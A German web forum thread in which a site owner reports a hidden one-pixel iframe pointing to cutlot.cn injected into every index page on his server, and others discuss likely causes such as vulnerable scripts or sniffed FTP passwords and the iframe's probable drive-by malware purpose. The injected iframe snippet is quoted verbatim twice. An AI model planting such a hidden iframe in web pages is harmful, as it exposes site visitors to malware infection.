iframe cutlot.cn
0 
Felix Riesterer
0
iframe cutlot.cn
Der MartinHallo Forum,
ih habe gerade auf einem Webserver entdeckt, dass in JEDER index.html, index.php und main.php und evtl. auch noch in weiteren Dateien Fremdcode eingeschleust wurde und zwar folgender:
<iframe src="http://cutlot.cn/in.cgi?income51" width=1 height=1 style="visibility: hidden"></iframe>
Hat irgendeiner eine Idee, wie ich mir, bzw. mein Provider sich diesen Kram eingefangen hat?
Ich werde mal weiter forschen und suchen, bin aber für jeden Hinweis dankbar.
MfG,
fwap
-
Liebe(r) fwap,
in weiteren Dateien Fremdcode eingeschleust wurde und zwar folgender:
<iframe src="http://cutlot.cn/in.cgi?income51" width=1 height=1 style="visibility: hidden"></iframe>1.) Hast Du serverseitige Scripte auf Deiner Website?
Ja? -> 2a.) Bist Du Dir zu 100% sicher (eigentlich unmöglich, aber egal) dass die keine Angriffsmöglichkeit bieten?
Ja? -> 3a1.) Wirklich? Wirklich sicher? Dann lies unter 2b.) weiter.
Nein? -> 3a2.) gehe schleunigst auf Deinen Provider zu und versuche in kooperativer Weise den Angriff nachzuverfolgen (Server-Logs etc.) und Deine Sciherheitslücken zu beheben!Nein? -> 2b.) Frage Deinen Support, wie man Dir das erklären möchte, dass Deine HTML-Dateien ohne Deine Erlaubnis modifiziert wurden.
Liebe Grüße,
Felix Riesterer.
--
ie:% br:> fl:| va:) ls:[ fo:) rl:° n4:? de:> ss:| ch:? js:) mo:} zu:)-
Hallo Felix,
1.) Hast Du serverseitige Scripte auf Deiner Website?
Ja, PHP Version 4.4.9. Ich habe aber keine Ahnung, wie der Code ausgenutzt worden sein könnte.
Server-Logs sind angefordert und solange tappe ich im Dunkeln.
Die Webseite, die dort läuft, kommuniziert nach aussen nur .html-Dateien, mod_rewrite sei dank.Es gibt ein Login auf der Seite, was zwar schwer zu finden ist, aber bestimmt gesnifft worden sein könnte. Aber damit könnte man höchstens den Content der Seite ändern. Spitze Klammern werden im HTML angezeigt, so dass ich nicht wüßte, wie man so PHP-Code ausführen könnte.
Aufgefallen ist mir noch, dass auch Dateien im Verzeichnis direkt oberhalb des aktuellen DOCUMENT_ROOT betroffen sind. Weiter schauen kann ich mit meinem ftp-Zugang leider nicht.
MfG,
der fwap ;)Liebe Grüße,
Felix Riesterer.
-
Hallo,
»» 1.) Hast Du serverseitige Scripte auf Deiner Website?
Ja, PHP Version 4.4.9.abgesehen davon, dass PHP4 relativ veraltet ist - Felix meinte nicht die installierte PHP-Version, sondern von dir eingesetzte Scripte, die eventuell Schlupflöcher haben könnten. Foren, Gästebücher, Blogs, ...
Server-Logs sind angefordert und solange tappe ich im Dunkeln.
Die Webseite, die dort läuft, kommuniziert nach aussen nur .html-Dateien, mod_rewrite sei dank.Solange "nach innen" trotzdem PHP benutzt wird, und Parameter von außen auf irgendeine Weise an das Backend gelangen können, spielt das erstmal keine Rolle.
Aufgefallen ist mir noch, dass auch Dateien im Verzeichnis direkt oberhalb des aktuellen DOCUMENT_ROOT betroffen sind.
Das ist zwar eine wichtige Beobachtung - hilft aber nicht. PHP hat auch dort bestimmt Schreibrechte, und je nach Konfiguration des Servers könnte auch von einem anderen Kunden-Account aus dort ein Schreibzugriff möglich sein.
Merke: Das Sicherheitsproblem muss nicht bei dir liegen, nur weil dein Account betroffen ist. Es kann ein ganz anderer Account sein, sogar einer mit administrativen Rechten ...
Good luck,
Martin--
Lieber eine Fliege im Porzellanladen
als ein Elefant in der Suppe.-
Hallo Martin,
ja, ich benutzte php auch :)
Sobald ein Rechner im Netz ist, hat er ein Schlupfloch. Soweit ist mir das schon klar. Wo das aktuelle war, werde ich wohl nicht so schnell herausfinden.Die access-log hat jedenfalls zum betreffenden Zeitpunkt keinen Hinweis enthalten. Jedoch die ftp.log. Wir werden jetzt die Zugangsdaten ändern und mal abwarten. Ich vermute irgendein Passwort-Sniffer hat uns dass eingebrockt... Ich dachte zuerst daran, ob ich Opfer irgendeines bekannten Wurms oder so geworden bin und dass iframe cutlot.cn es bei irgendjemanden klingeln lässt.
Die Frage die noch bleibt ist die nach dem Sinn? Was bezweckt der IFRAME?
Wenn ich die Adresse aufrufe, werde ich auf hyperliteautoservices.cn weitergeleitet. Tja und da lande ich bei einer Indian Web Hosting Company.
Da will wohl vermutlich jemand Klicks erzeugen. Anders kann ich es mir nicht erklären.
MfG,
fwap-
Tach,
Die Frage die noch bleibt ist die nach dem Sinn? Was bezweckt der IFRAME?
z.B. Software installieren bei Anwendern die auf deine Seite gehen und offene Sicherheitslücken in ihrem Broser haben.
mfg
Woodfighter
-
-
-
-